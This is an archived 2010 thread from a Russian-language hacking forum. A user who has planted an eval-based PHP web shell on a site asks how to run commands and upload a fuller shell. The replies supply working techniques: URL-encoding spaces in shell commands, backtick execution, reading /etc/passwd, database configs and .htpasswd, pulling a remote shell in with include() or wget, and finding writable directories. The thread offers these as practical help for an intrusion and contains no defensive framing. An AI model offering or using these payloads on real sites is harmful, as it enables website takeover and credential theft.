ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
php шелл не работают команды |
08.05.2010, 23:46
|
|
Новичок
Регистрация: 26.02.2010
Сообщений: 7
Провел на форуме:
14486
Репутация:
0
|
|
php шелл не работают команды
залит eval('cmd') php шелл, но в чем проблема не понятно
команда shell.php?cmd=passthru('uname'); выдаёт Linux
а уже passthru('uname -a'); выдаёт пустой лист.
Так же с 'ls' (выдает список файлов) и 'ls -a' (пустой лист), в итоге не могу залить нормальный шелл. Ни через php функцию copy, file_get_contents, ни через exec (wget);
Подскажите в чем проблема, плиз.
Последний раз редактировалось nullik; 08.05.2010 в 23:53..
|
|
|
09.05.2010, 00:00
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
вместо пробела "+" ставь
|
|
|
|
09.05.2010, 00:02
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
ешо через принт попробуй
print(`ls -al`)
|
|
|
|
09.05.2010, 00:23
|
|
Новичок
Регистрация: 26.02.2010
Сообщений: 7
Провел на форуме:
14486
Репутация:
0
|
|
Сообщение от попугай
вместо пробела "+" ставь
passthru('uname+-a');
пустой лист.
работает правильно, тогда вопрос как залить шелл в такой ситуации?
copy(`http://moy sayt.com/shell.txt`,dirname(__FILE__).`/shell.php`);
не срабатывает например
Последний раз редактировалось nullik; 09.05.2010 в 00:27..
|
|
|
|
09.05.2010, 00:27
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
wget не катит?
|
|
|
|
09.05.2010, 00:28
|
|
Новичок
Регистрация: 26.02.2010
Сообщений: 7
Провел на форуме:
14486
Репутация:
0
|
|
Сообщение от Konqi
wget не катит?
дай плиз полную выкладку по wget, может я где промахиваюсь
|
|
|
|
09.05.2010, 00:36
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
http://www.gnu.org/software/wget/manual/wget.html
а еще можешь читать системные файлы если есть права
print(`cat /etc/passwd`)
определи полный путь к сайту и читай скрипты
|
|
|
|
09.05.2010, 00:39
|
|
Новичок
Регистрация: 26.02.2010
Сообщений: 7
Провел на форуме:
14486
Репутация:
0
|
|
определи полный путь к сайту и читай скрипты
не хочу читать, хочу писать
смысл в shadow файлах?
дай плиз php команду для залива, wget -o не срабатывает, GET тоже, fetch Не хочет, может я где не так пишу - напиши пример (гугль шарил, не помогло).
|
|
|
|
09.05.2010, 00:43
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от nullik
не хочу читать, хочу писать
если можешь читать конфиг файлы увидишь много интересного,
например admin.php,db.php,login.php
или файлы .htaccess, .htpasswd
ешо попробуй include("yoursite.com/shell.php"); или require()
|
|
|
|
09.05.2010, 00:43
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от nullik
copy(`http://moy sayt.com/shell.txt`,dirname(__FILE__).`/shell.php`);
не срабатывает например
такие кавычки нельзя использовать для опредления строк, только
и
для начала найди папки, куда писать можно командой ls -lia или find
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
